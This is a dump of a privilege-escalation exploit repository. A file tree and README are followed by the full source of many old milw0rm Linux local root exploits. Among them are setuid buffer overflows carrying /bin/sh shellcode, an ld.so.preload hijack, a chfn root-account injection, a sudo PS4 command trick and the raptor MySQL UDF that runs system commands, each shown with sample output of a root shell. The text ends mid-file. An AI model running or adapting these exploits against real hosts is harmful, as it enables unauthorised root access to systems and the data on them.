├── README.md ├── linux ├── linux_exploits │ ├── 9545 │ ├── 10018.sh │ ├── 10022.c │ ├── 10038.txt │ ├── 10060.sh │ ├── 1009.c │ ├── 1029.c │ ├── 10313.c │ ├── 10396.pl │ ├── 104.c │ ├── 10487.txt │ ├── 106.c │ ├── 10613.c │ ├── 10617.txt │ ├── 1154.pl │ ├── 11650.c │ ├── 1170.c │ ├── 1181.c │ ├── 1187.c │ ├── 12.c │ ├── 120.c │ ├── 12130.py │ ├── 1215.c │ ├── 1229.sh │ ├── 1267.c │ ├── 129.asm │ ├── 1297.py │ ├── 1299.sh │ ├── 1300.sh │ ├── 131.c │ ├── 1310.txt │ ├── 1316.pl │ ├── 1397.c │ ├── 140.c │ ├── 141.c │ ├── 1412.rb │ ├── 1415.c │ ├── 142.c │ ├── 1425.c │ ├── 14273.sh │ ├── 14339.sh │ ├── 144.c │ ├── 1445.c │ ├── 1449.c │ ├── 145.c │ ├── 14814.c │ ├── 14830.py │ ├── 15023.c │ ├── 15024.c │ ├── 15074.sh │ ├── 15150.c │ ├── 15155.c │ ├── 1518.c │ ├── 152.c │ ├── 15274. │ ├── 15274.txt │ ├── 15285.c │ ├── 15304.txt │ ├── 154.c │ ├── 15620.sh │ ├── 15704.c │ ├── 15745.txt │ ├── 15774.c │ ├── 1579.pl │ ├── 1591.py │ ├── 15916.c │ ├── 15944.c │ ├── 1596.txt │ ├── 15974.txt │ ├── 160.c │ ├── 16086.txt │ ├── 17083.pl │ ├── 17147.txt │ ├── 178.c │ ├── 180.c │ ├── 182.sh │ ├── 183.c │ ├── 1831.txt │ ├── 184.pl │ ├── 186.pl │ ├── 193.sh │ ├── 2004.c │ ├── 2005.c │ ├── 2006.c │ ├── 2009-therebel.tgz │ ├── 2009-wunderbar_emporium.tgz │ ├── 2011.sh │ ├── 2013.c │ ├── 2015.py │ ├── 2016.sh │ ├── 203.sh │ ├── 2031.c │ ├── 205.pl │ ├── 206.c │ ├── 209.c │ ├── 21.c │ ├── 2144.sh │ ├── 215.c │ ├── 216.c │ ├── 217.c │ ├── 218.c │ ├── 219.c │ ├── 2193.php │ ├── 221.c │ ├── 222.c │ ├── 229.c │ ├── 231.sh │ ├── 2338.c │ ├── 2404.c │ ├── 2466.pl │ ├── 249.c │ ├── 2492.s │ ├── 252.pl │ ├── 255.pl │ ├── 257.pl │ ├── 258.sh │ ├── 2581.c │ ├── 260.c │ ├── 273.c │ ├── 285.c │ ├── 290.sh │ ├── 3.c │ ├── 31.pl │ ├── 3154.c │ ├── 317.txt │ ├── 319.c │ ├── 320.pl │ ├── 3213.c │ ├── 322.c │ ├── 325.c │ ├── 331.c │ ├── 3330.pl │ ├── 3333.pl │ ├── 3384.c │ ├── 339.c │ ├── 3426.php │ ├── 3427.php │ ├── 3440.php │ ├── 34536.sh │ ├── 3479.php │ ├── 3480.php │ ├── 3499.php │ ├── 3525.php │ ├── 3529.php │ ├── 3571.php │ ├── 3572.php │ ├── 3587.c │ ├── 3595.c │ ├── 36108.c │ ├── 369.pl │ ├── 36901-1.c │ ├── 3730.txt │ ├── 374.c │ ├── 375.c │ ├── 393.c │ ├── 394.c │ ├── 40.pl │ ├── 4028.txt │ ├── 411.c │ ├── 417.c │ ├── 4172.c │ ├── 434.sh │ ├── 438.c │ ├── 4460.c │ ├── 466.pl │ ├── 469.c │ ├── 4698.c │ ├── 470.c │ ├── 4756.c │ ├── 476.c │ ├── 479.c │ ├── 5092.c │ ├── 5093.c │ ├── 5167.sh │ ├── 5424.txt │ ├── 586.c │ ├── 587.c │ ├── 591.c │ ├── 600.c │ ├── 601.c │ ├── 6032.py │ ├── 624.c │ ├── 6337.sh │ ├── 657.c │ ├── 669.c │ ├── 684.c │ ├── 6851.c │ ├── 695.c │ ├── 71.c │ ├── 7177.c │ ├── 718.c │ ├── 72.c │ ├── 7313.sh │ ├── 7393.txt │ ├── 741.pl │ ├── 744.c │ ├── 75.c │ ├── 756.c │ ├── 7618.c │ ├── 763.c │ ├── 7681.txt │ ├── 776.c │ ├── 778.c │ ├── 779.sh │ ├── 7855.txt │ ├── 7856.txt │ ├── 788.pl │ ├── 791.c │ ├── 792.c │ ├── 796.sh │ ├── 816.c │ ├── 824.c │ ├── 8303.c │ ├── 8369.sh │ ├── 8470.py │ ├── 8478.sh │ ├── 8534.c │ ├── 8572.c │ ├── 8673.c │ ├── 8678.c │ ├── 876.c │ ├── 877.pl │ ├── 890.pl │ ├── 895.c │ ├── 9083.c │ ├── 91.c │ ├── 913.pl │ ├── 9135.sh │ ├── 914.c │ ├── 9191.txt │ ├── 9208.txt │ ├── 924.c │ ├── 926.c │ ├── 93.c │ ├── 9302.py │ ├── 9352.c │ ├── 9363.c │ ├── 9435.txt │ ├── 9436.sh │ ├── 9436.txt │ ├── 9436a.c │ ├── 9436b.c │ ├── 9477.txt │ ├── 9479.c │ ├── 950.c │ ├── 9513.c │ ├── 9521.c │ ├── 9542.c │ ├── 9543.c │ ├── 9545.c │ ├── 9574.txt │ ├── 9575.c │ ├── 9595.c │ ├── 9598.txt │ ├── 9608.c │ ├── 9627.txt │ ├── 9641.txt │ ├── 9709.txt │ ├── 973.c │ ├── 974.pl │ ├── 9844.py │ ├── 997.sh │ ├── android-root-20090816.tar.gz │ ├── android-root │ │ ├── Android.mk │ │ ├── Makefile │ │ ├── armelf.x │ │ ├── asroot.c │ │ ├── own.c │ │ └── rootsh.c │ ├── calls.dat │ ├── dirtyc0w.c │ ├── exploit1.c │ ├── exploit10.c │ ├── exploit11.c │ ├── exploit12.c │ ├── exploit2.c │ ├── exploit3.c │ ├── exploit4.c │ ├── exploit5.c │ ├── exploit6.c │ ├── exploit7.c │ ├── exploit8.c │ ├── exploit9.c │ ├── exploitall │ ├── exploitc.c │ ├── linux_local_exploits.tar.gz │ ├── local_linux_rootkit.tar.gz │ ├── suid.c │ ├── suid_local_root_centos5_exploit │ ├── therebel │ │ ├── exploit.c │ │ ├── pwnkernel.c │ │ └── therebel.sh │ ├── udev_txt │ └── wunderbar_emporium │ │ ├── exploit.c │ │ ├── exploit.so │ │ ├── pwnkernel │ │ ├── pwnkernel.c │ │ ├── tzameti.avi │ │ └── wunderbar_emporium.sh └── scripts │ ├── linux_checksec.sh │ ├── linux_enum.sh │ ├── linux_gather_files.sh │ ├── linux_kernel_exploiter.pl │ ├── linux_privesc.py │ ├── linux_privesc.sh │ └── linux_security_test ├── mysql ├── lib_mysqludf_sys_0.0.3.tar.gz ├── raptor_udf.c └── raptor_udf2.c └── windows ├── windows-privesc-check.exe ├── windows-privesc-check.py └── windows-privesc-check ├── COPYING.GPL ├── COPYING.WINDOWS-PRIVESC-CHECK ├── windows-privesc-check.exe └── windows-privesc-check.py /README.md: -------------------------------------------------------------------------------- 1 | # PrivEsc by 1N3@CrowdShield 2 | http://crowdshield.com 3 | 4 | ## ABOUT: 5 | A collection of Windows, Linux and MySQL privilege escalation scripts and exploits. 6 | 7 | ## LINKS: 8 | For pre-compiled local linux exploits, check out https://www.kernel-exploits.com. 9 | 10 | ## DONATIONS: 11 | Donations are welcome. 12 | - [x] BTC 1Fav36btfmdrYpCAR65XjKHhxuJJwFyKum 13 | - [x] DASH XoWYdMDGb7UZmzuLviQYtUGb5MNXSkqvXG 14 | - [x] ETH 0x20bB09273702eaBDFbEE9809473Fd04b969a794d 15 | - [x] LTC LQ6mPewec3xeLBYMdRP4yzeta6b9urqs2f -------------------------------------------------------------------------------- /linux/linux_exploits/10018.sh: -------------------------------------------------------------------------------- 1 | while : ; do 2 | { echo y ; sleep 1 ; } | { while read ; do echo z$REPLY; done ; } & 3 | PID=$! 4 | OUT=$(ps -efl | grep 'sleep 1' | grep -v grep | 5 | { read PID REST ; echo $PID; } ) 6 | OUT="${OUT%% *}" 7 | DELAY=$((RANDOM * 1000 / 32768)) 8 | usleep $((DELAY * 1000 + RANDOM % 1000 )) 9 | echo n > /proc/$OUT/fd/1 # Trigger defect 10 | done -------------------------------------------------------------------------------- /linux/linux_exploits/10022.c: -------------------------------------------------------------------------------- 1 | int main(void) 2 | { 3 | int ret; 4 | int csd; 5 | int lsd; 6 | struct sockaddr_un sun; 7 | 8 | /* make an abstruct name address (*) */ 9 | memset(&sun, 0, sizeof(sun)); 10 | sun.sun_family = PF_UNIX; 11 | sprintf(&sun.sun_path[1], "%d", getpid()); 12 | 13 | /* create the listening socket and shutdown */ 14 | lsd = socket(AF_UNIX, SOCK_STREAM, 0); 15 | bind(lsd, (struct sockaddr *)&sun, sizeof(sun)); 16 | listen(lsd, 1); 17 | shutdown(lsd, SHUT_RDWR); 18 | 19 | /* connect loop */ 20 | alarm(15); /* forcely exit the loop after 15 sec */ 21 | for (;;) { 22 | csd = socket(AF_UNIX, SOCK_STREAM, 0); 23 | ret = connect(csd, (struct sockaddr *)&sun, sizeof(sun)); 24 | if (-1 == ret) { 25 | perror("connect()"); 26 | break; 27 | } 28 | puts("Connection OK"); 29 | } 30 | return 0; 31 | } -------------------------------------------------------------------------------- /linux/linux_exploits/1029.c: -------------------------------------------------------------------------------- 1 | /* epsxe-e.c 2 | ePSXe v1.* local exploit 3 | By: Qnix 4 | e-mail: q-nix[at]hotmail[dot]com 5 | ePSXe-website: www.epsxe.com 6 | 7 | EXP-Sample: 8 | 9 | root@Qnix:~/epsxe# gcc -o epsxe-e epsxe-e.c 10 | root@Qnix:~/epsxe# ./epsxe-e 11 | 12 | ************************************* 13 | ePSXe v1.* local exploit 14 | by 15 | Qnix | Q-nix[at]hotmail[dot]com 16 | ************************************* 17 | 18 | [~] Stack pointer (ESP) : 0xbffff568 19 | [~] Offset from ESP : 0x0 20 | [~] Desired Return Addr : 0xbffff568 21 | 22 | * Running ePSXe emulator version 1.6.0. 23 | * Memory handlers init. 24 | sh-2.05b# id 25 | uid=0(root) gid=0(root) 26 | groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy) 27 | 28 | 29 | 30 | 31 | */ 32 | 33 | 34 | #include 35 | 36 | char shellcode[] = 37 | "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0" 38 | "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d" 39 | "\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73" 40 | "\x68"; 41 | 42 | unsigned long sp(void) 43 | { __asm__("movl %esp, %eax");} 44 | 45 | int main(int argc, char *argv[]) 46 | { 47 | int i, offset; 48 | long esp, ret, *addr_ptr; 49 | char *buffer, *ptr; 50 | 51 | offset = 0; 52 | esp = sp(); 53 | ret = esp - offset; 54 | 55 | printf("\n ************************************* \n"); 56 | printf(" ePSXe v1.* local exploit \n"); 57 | printf(" by \n"); 58 | printf(" Qnix | Q-nix[at]hotmail[dot]com "); 59 | printf("\n ************************************* \n\n"); 60 | printf("[~] Stack pointer (ESP) : 0x%x\n", esp); 61 | printf("[~] Offset from ESP : 0x%x\n", offset); 62 | printf("[~] Desired Return Addr : 0x%x\n\n", ret); 63 | 64 | buffer = malloc(600); 65 | 66 | ptr = buffer; 67 | addr_ptr = (long *) ptr; 68 | for(i=0; i < 600; i+=4) 69 | { *(addr_ptr++) = ret; } 70 | 71 | for(i=0; i < 200; i++) 72 | { buffer[i] = '\x90'; } 73 | 74 | ptr = buffer + 200; 75 | for(i=0; i < strlen(shellcode); i++) 76 | { *(ptr++) = shellcode[i]; } 77 | 78 | buffer[600-1] = 0; 79 | 80 | execl("./epsxe", "epsxe", "-nogui", buffer, 0); 81 | 82 | free(buffer); 83 | 84 | return 0; 85 | } 86 | 87 | // milw0rm.com [2005-06-04] 88 | -------------------------------------------------------------------------------- /linux/linux_exploits/104.c: -------------------------------------------------------------------------------- 1 | /* 0x333hztty => hztty 2.0 local root exploit 2 | * 3 | * 4 | * more info : Debian Security Advisory DSA 385-1 5 | * 6 | * *note* I adjusted some part of hztty's code since 7 | * there were some errors. hope this will not influence 8 | * exploitation :> tested against Red Hat 9.0 : 9 | * 10 | * [c0wboy@0x333 c0wboy]$ gcc 0x333hztty.c -o k 11 | * [c0wboy@0x333 c0wboy]$ ./k 12 | * 13 | * --- local root exploit for hztty 2.0 --- 14 | * --- coded by c0wboy ~ 0x33 --- 15 | * 16 | * sh-2.05b# [./hztty started] [using /dev/ttyp6] 17 | * sh-2.05b$ sh-2.05b# uid=0(root) gid=0(root) groups=500(c0wboy) 18 | * sh-2.05b# 19 | * 20 | * coded by c0wboy 21 | * 22 | * (c) 0x333 Outsiders Security Labs 23 | * 24 | */ 25 | 26 | #include 27 | #include 28 | 29 | #define BIN "./hztty" 30 | #define SIZE 272 31 | 32 | 33 | unsigned char shellcode[] = 34 | "\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8" 35 | "\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68" 36 | "\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31" 37 | "\xd2\xb0\x0b\xcd\x80" ; 38 | 39 | int main() 40 | { 41 | int i; 42 | char out[SIZE]; 43 | char *own[] = { shellcode, 0x0 }; 44 | 45 | int *hztty = (int *)(out); 46 | int ret = 0xbffffffa - strlen(BIN) - strlen(shellcode); 47 | 48 | for (i=0 ; i ii+1) // -i imageDirectory 27 | strcpy(imagedirk,argv[++ii]); //Overflow 28 | else if (strEqu(argv[ii],"-f") && argc > ii+1) // -f imageFile 29 | 30 | strcpy(clfile,argv[++ii]); //Overflow 31 | else strcpy(clfile,argv[ii]); //Overflow // assume imageFile 32 | } 33 | ...... 34 | 35 | Proof Of Concept: 36 | Image filename overflow: 37 | 38 | $ ./printoxx -i $(python -c 'print "A"*1000') 39 | 40 | Directory filename overflow: 41 | $ ./printoxx -f $(python -c 'print "A"*1000') 42 | 43 | Severity: Very Low 44 | 45 | Note: Since this was tested on Fedora 12, the system automatically detected the operation as a possible buffer overflow attempt instead of a regular segfault. This is due to the fact that all executables on Red-Hat 46 | 47 | RHEL and Fedora systems are compiled with canaries enabled. 48 | 49 | #$ 50 | 51 | -------------------------------------------------------------------------------- /linux/linux_exploits/1181.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $Id: raptor_udf.c,v 1.1 2004/12/04 14:44:39 raptor Exp $ 3 | * 4 | * raptor_udf.c - dynamic library for do_system() MySQL UDF 5 | * Copyright (c) 2004 Marco Ivaldi 6 | * 7 | * This is an helper dynamic library for local privilege escalation through 8 | * MySQL run with root privileges (very bad idea!). Tested on MySQL 4.0.17. 9 | * 10 | * Code ripped from: http://www.ngssoftware.com/papers/HackproofingMySQL.pdf 11 | * 12 | * "MySQL provides a mechanism by which the default set of functions can be 13 | * expanded by means of custom written dynamic libraries containing User 14 | * Defined Functions, or UDFs". -- Hackproofing MySQL 15 | * 16 | * Usage: 17 | * $ id 18 | * uid=500(raptor) gid=500(raptor) groups=500(raptor) 19 | * $ gcc -g -c raptor_udf.c 20 | * $ gcc -g -shared -W1,-soname,raptor_udf.so -o raptor_udf.so raptor_udf.o -lc 21 | * $ mysql -u root -p 22 | * Enter password: 23 | * [...] 24 | * mysql> use mysql; 25 | * mysql> create table foo(line blob); 26 | * mysql> insert into foo values(load_file('/home/raptor/raptor_udf.so')); 27 | * mysql> select * from foo into dumpfile '/usr/lib/raptor_udf.so'; 28 | * mysql> create function do_system returns integer soname 'raptor_udf.so'; 29 | * mysql> select * from mysql.func; 30 | * +-----------+-----+---------------+----------+ 31 | * | name | ret | dl | type | 32 | * +-----------+-----+---------------+----------+ 33 | * | do_system | 2 | raptor_udf.so | function | 34 | * +-----------+-----+---------------+----------+ 35 | * mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out'); 36 | * mysql> \! sh 37 | * sh-2.05b$ cat /tmp/out 38 | * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm) 39 | * [...] 40 | */ 41 | 42 | #include 43 | #include 44 | 45 | enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT}; 46 | 47 | typedef struct st_udf_args { 48 | unsigned int arg_count; // number of arguments 49 | enum Item_result *arg_type; // pointer to item_result 50 | char **args; // pointer to arguments 51 | unsigned long *lengths; // length of string args 52 | char *maybe_null; // 1 for maybe_null args 53 | } UDF_ARGS; 54 | 55 | typedef struct st_udf_init { 56 | char maybe_null; // 1 if func can return NULL 57 | unsigned int decimals; // for real functions 58 | unsigned long max_length; // for string functions 59 | char *ptr; // free ptr for func data 60 | char const_item; // 0 if result is constant 61 | } UDF_INIT; 62 | 63 | int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error) 64 | { 65 | if (args->arg_count != 1) 66 | return(0); 67 | 68 | system(args->args[0]); 69 | 70 | return(0); 71 | } 72 | 73 | // milw0rm.com [2004-12-24] 74 | -------------------------------------------------------------------------------- /linux/linux_exploits/120.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1N3/PrivEsc/33b129469180d85e77a03f1ba34b48e08843b20e/linux/linux_exploits/120.c -------------------------------------------------------------------------------- /linux/linux_exploits/1215.c: -------------------------------------------------------------------------------- 1 | // (if the iwconfig executable is setuid) /str0ke 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | /* 45 Byte /bin/sh >> http://www.milw0rm.com/id.php?id=1169 */ 9 | char shellcode[]= 10 | "\x31\xc0\x31\xdb\x50\x68\x2f\x2f" 11 | "\x73\x68\x68\x2f\x62\x69\x6e\x89" 12 | "\xe3\x50\x53\x89\xe1\x31\xd2\xb0" 13 | "\x0b\x51\x52\x55\x89\xe5\x0f\x34" 14 | "\x31\xc0\x31\xdb\xfe\xc0\x51\x52" 15 | "\x55\x89\xe5\x0f\x34"; 16 | 17 | int main(int argc,char **argv){ 18 | char buf[96]; 19 | long esp, *addr_ptr; 20 | unsigned long ret; 21 | int i, offset; 22 | unsigned long sp(void) 23 | { __asm__("movl %esp, %eax");} 24 | char *prog[]={argv[1],buf,NULL}; 25 | char *env[]={"3v1lsh3ll0=",shellcode,NULL}; 26 | 27 | if (argc >= 2) { 28 | printf("\n*********************************************\n"); 29 | printf(" iwconfig Version 26 Localroot Exploit \n"); 30 | printf(" Coded by Qnix[at]bsdmail[dot]org \n"); 31 | printf("*********************************************\n\n"); 32 | } else { 33 | printf("\n*********************************************\n"); 34 | printf(" iwconfig Version 26 Localroot Exploit \n"); 35 | printf(" Coded by Qnix[at]bsdmail[dot]org \n"); 36 | printf("*********************************************\n\n"); 37 | printf("\n USEAGE: ./iwconfig-exploit \n\n"); 38 | return 1; 39 | } 40 | 41 | offset = 0; 42 | esp = sp(); 43 | ret=0xc0000000-strlen(shellcode)-strlen(prog[0])-0x06; 44 | printf("[~] S-p.ESP : 0x%x\n", esp); 45 | printf("[~] O-F.ESP : 0x%x\n", offset); 46 | printf("[~] Return Addr : 0x%x\n\n", ret); 47 | 48 | memset(buf,0x41,sizeof(buf)); 49 | memcpy(&buf[92],&ret,4); 50 | 51 | execve(prog[0],prog,env); 52 | 53 | } 54 | 55 | // milw0rm.com [2005-09-14] 56 | -------------------------------------------------------------------------------- /linux/linux_exploits/1229.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # tested and working /str0ke 3 | ########################################################################### 4 | # Linux Qpopper poppassd latest version local r00t exploit by kcope ### 5 | # August 2005 ### 6 | # Confidential - Keep Private! ### 7 | ########################################################################### 8 | 9 | POPPASSD_PATH=/usr/local/bin/poppassd 10 | 11 | echo "" 12 | echo "Linux Qpopper poppassd latest version local r00t exploit by kcope" 13 | echo "" 14 | sleep 2 15 | umask 0000 16 | if [ -f /etc/ld.so.preload ]; then 17 | echo "OOPS /etc/ld.so.preload already exists.. exploit failed!" 18 | exit 19 | fi 20 | cat > program.c << _EOF 21 | #include 22 | #include 23 | #include 24 | #include 25 | 26 | void _init() 27 | { 28 | if (!geteuid()) { 29 | setgid(0); 30 | setuid(0); 31 | remove("/etc/ld.so.preload"); 32 | execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL); 33 | } 34 | } 35 | 36 | _EOF 37 | gcc -o program.o -c program.c -fPIC 38 | gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles 39 | cat > suid.c << _EOF 40 | int main(void) { 41 | setgid(0); setuid(0); 42 | unlink("/tmp/suid"); 43 | execl("/bin/sh","sh",0); } 44 | _EOF 45 | 46 | gcc -o /tmp/suid suid.c 47 | cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0 48 | echo "--- Now type ENTER ---" 49 | echo "" 50 | $POPPASSD_PATH -t /etc/ld.so.preload 51 | echo /tmp/libno_ex.so.1.0 > /etc/ld.so.preload 52 | su 53 | if [ -f /tmp/suid ]; then 54 | echo "IT'S A ROOTSHELL!!!" 55 | /tmp/suid 56 | else 57 | echo "Sorry, exploit failed." 58 | fi 59 | 60 | # milw0rm.com [2005-09-24] 61 | -------------------------------------------------------------------------------- /linux/linux_exploits/1299.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | # Exploit for SuSE Linux 9.{1,2,3}/10.0, Desktop 1.0, UnitedLinux 1.0 4 | # and SuSE Linux Enterprise Server {8,9} 'chfn' local root bug. 5 | # 6 | # by Hunger 7 | # 8 | # Advistory: 9 | # http://lists.suse.com/archive/suse-security-announce/2005-Nov/0002.html 10 | # 11 | # hunger@suse:~> id 12 | # uid=1000(hunger) gid=1000(hunger) groups=1000(hunger) 13 | # hunger@suse:~> ./susechfn.sh 14 | # Type your current password to get root... :) 15 | # Password: 16 | # sh-2.05b# id 17 | # uid=0(r00t) gid=0(root) groups=0(root) 18 | 19 | if [ X"$SHELL" = "X" ]; then 20 | echo "No SHELL environment, using /bin/sh for default." 21 | export SHELL=/bin/sh 22 | fi 23 | 24 | if [ -u /usr/bin/chfn ]; then 25 | /bin/echo "Type your current password to get root... :)" 26 | /usr/bin/chfn -h "`echo -e ':/:'$SHELL'\nr00t::0:0:'`" $USER > /dev/null 27 | if [ -u /bin/su ]; then 28 | /bin/su r00t 29 | /bin/echo "You can get root again with 'su r00t'" 30 | else 31 | echo "/bin/su file is not setuid root :(" 32 | fi 33 | else 34 | echo "/usr/bin/chfn file is not setuid root :(" 35 | fi 36 | 37 | # milw0rm.com [2005-11-08] 38 | -------------------------------------------------------------------------------- /linux/linux_exploits/1310.txt: -------------------------------------------------------------------------------- 1 | ## Sudo local root escalation privilege ## 2 | ## vuln versions : sudo < 1.6.8p10 3 | ## by breno 4 | 5 | ## You need sudo access execution for some bash script ## 6 | ## Use csh shell to change SHELLOPTS env ## 7 | 8 | ie: 9 | %cat x.sh 10 | #!/bin/bash -x 11 | 12 | echo "Getting root!!" 13 | % 14 | ## 15 | 16 | ## 17 | # cat /etc/sudoers 18 | ... 19 | breno ALL=(ALL) /home/breno/x.sh 20 | .. 21 | # 22 | 23 | ## Let's use an egg shell :) 24 | %cat egg.c 25 | 26 | #include 27 | 28 | int main() 29 | { 30 | setuid(0); 31 | system("/bin/sh"); 32 | } 33 | % 34 | 35 | % gcc -o egg egg.c 36 | % setenv SHELLOPTS xtrace 37 | % setenv PS4 '$(chown root:root egg)' 38 | % sudo ./x.sh 39 | echo Getting root!! 40 | Getting root!! 41 | % ls -lisa egg 42 | 1198941 8 -rwxr-xr-x 1 root root 7428 2005-11-09 13:54 egg 43 | % setenv PS4 '$(chmod +s egg)' 44 | % sudo ./x.sh 45 | echo Getting root!! 46 | Getting root!! 47 | % ./egg 48 | sh-3.00# id 49 | uid=0(root) gid=1000(breno) egid=0(root) grupos=7(lp),102(lpadmin),1000(breno) 50 | sh-3.00# 51 | 52 | # milw0rm.com [2005-11-09] 53 | -------------------------------------------------------------------------------- /linux/linux_exploits/1316.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | # 3 | # Veritas Storage Foundation 4.0 4 | # 5 | # http://www.digitalmunition.com 6 | # kf (kf_lists[at]digitalmunition[dot]com) - 08/19/2005 7 | # 8 | # This bug has not been patched as of: 9 | # Q14438H.sf.4.0.00.0.rhel3_i686.tar.gz 10 | # 11 | # Make sure you don't get your sploits from some 12 | # Frenchie at FR-SIRT go to milw0rm instead. 13 | # 14 | $retval = 0xbffffc17; 15 | 16 | $tgts{"0"} = "/opt/VRTSvcs/bin/haagent:72"; 17 | $tgts{"1"} = "/opt/VRTSvcs/bin/haalert:72"; 18 | $tgts{"2"} = "/opt/VRTSvcs/bin/haattr:72"; 19 | $tgts{"3"} = "/opt/VRTSvcs/bin/hacli:72"; 20 | $tgts{"4"} = "/opt/VRTSvcs/bin/hareg:72"; 21 | $tgts{"5"} = "/opt/VRTSvcs/bin/haclus:72"; 22 | $tgts{"6"} = "/opt/VRTSvcs/bin/haconf:72"; 23 | $tgts{"7"} = "/opt/VRTSvcs/bin/hadebug:72"; 24 | $tgts{"8"} = "/opt/VRTSvcs/bin/hagrp:72"; 25 | $tgts{"9"} = "/opt/VRTSvcs/bin/hahb:72"; 26 | $tgts{"10"} = "/opt/VRTSvcs/bin/halog:72"; 27 | $tgts{"11"} = "/opt/VRTSvcs/bin/hares:72"; 28 | $tgts{"12"} = "/opt/VRTSvcs/bin/hastatus:72"; 29 | $tgts{"13"} = "/opt/VRTSvcs/bin/hasys:72"; 30 | $tgts{"14"} = "/opt/VRTSvcs/bin/hatype:72"; 31 | $tgts{"15"} = "/opt/VRTSvcs/bin/hauser:72"; 32 | $tgts{"16"} = "/opt/VRTSvcs/bin/tststew:72"; 33 | 34 | unless (($target) = @ARGV) { 35 | 36 | print "\n Veritas Storage Foundation VCSI18N_LANG overflow, kf \(kf_lists[at]digitalmunition[dot]com\) - 08/19/2005\n"; 37 | print "\n\nUsage: $0 \n\nTargets:\n\n"; 38 | 39 | foreach $key (sort(keys %tgts)) { 40 | ($a,$b) = split(/\:/,$tgts{"$key"}); 41 | print "\t$key . $a\n"; 42 | } 43 | 44 | print "\n"; 45 | exit 1; 46 | } 47 | 48 | $ret = pack("l", ($retval)); 49 | ($a,$b) = split(/\:/,$tgts{"$target"}); 50 | print "*** Target: $a, Len: $b\n\n"; 51 | 52 | $sc = "\x90"x1024; 53 | $sc .= "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80"; 54 | $sc .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"; 55 | $sc .= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"; 56 | $sc .= "\x80\xe8\xdc\xff\xff\xff/bin/sh"; 57 | 58 | $buf = "A" x $b; 59 | $buf .= "$ret" x 2; 60 | 61 | $ENV{"VCSI18N_LANG"} = $buf; 62 | $ENV{"DMR0x"} = $sc; 63 | 64 | exec("$a DMR0x"); 65 | 66 | # milw0rm.com [2005-11-12] 67 | -------------------------------------------------------------------------------- /linux/linux_exploits/140.c: -------------------------------------------------------------------------------- 1 | /* 0x333xsok (2) => xsok 1.02 local game exploit 2 | * 3 | * Happy new year ! (2 :) 4 | * coded by c0wboy 5 | * 6 | * (c) 0x333 Outsiders Security Labs / www.0x333.org 7 | * 8 | */ 9 | 10 | 11 | #include 12 | #include 13 | 14 | #define BIN "/usr/games/xsok" 15 | #define RETADD 0xbffffa3c 16 | #define SIZE 200 17 | 18 | 19 | unsigned char shellcode[] = 20 | 21 | /* setregid (20,20) shellcode */ 22 | "\x31\xc0\x31\xdb\x31\xc9\xb3\x14\xb1\x14\xb0\x47" 23 | "\xcd\x80" 24 | 25 | /* exec /bin/sh shellcode */ 26 | "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62" 27 | "\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"; 28 | 29 | 30 | 31 | int main (int argc, char ** argv) 32 | { 33 | int i, ret = RETADD; 34 | char out[SIZE]; 35 | 36 | fprintf(stdout, "\n --- 0x333xsok => xsok 1.02 local games exploit ---\n"); 37 | fprintf(stdout, " --- Outsiders Se(c)urity Labs 2003 ---\n\n"); 38 | 39 | int *xsok = (int *)(out); 40 | 41 | for (i=0; i 22 | #include 23 | #include 24 | #include 25 | 26 | #define MREMAP_MAYMOVE 1 27 | #define MREMAP_FIXED 2 28 | 29 | #define __NR_real_mremap __NR_mremap 30 | 31 | static inline _syscall5( void *, real_mremap, void *, old_address, 32 | size_t, old_size, size_t, new_size, 33 | unsigned long, flags, void *, new_address ); 34 | 35 | int main( void ) 36 | { 37 | void *base; 38 | 39 | base = mmap( NULL, 8192, PROT_READ | PROT_WRITE, 40 | MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 ); 41 | 42 | real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED, 43 | (void *) 0xC0000000 ); 44 | 45 | fork(); 46 | 47 | return( 0 ); 48 | } 49 | 50 | // milw0rm.com [2004-01-06] 51 | -------------------------------------------------------------------------------- /linux/linux_exploits/1412.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/ruby 2 | 3 | # 4 | # One of the PoC code for xmame "-lang" options. 5 | # Advisory is base on : http://kerneltrap.org/node/6055 6 | # 7 | # by xwings at mysec dot org 8 | # url : http://www.mysec.org , new website 9 | 10 | # Tested on : 11 | # Linux debian24 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux 12 | # gcc version 4.0.3 20060104 (prerelease) (Ubuntu 4.0.2-6ubuntu1) 13 | # xmame 0.102 , ./configure && make && make install 14 | # 15 | 16 | 17 | #setreuid(geteuid(),geteuid()) execl(); executes /bin//sh 49 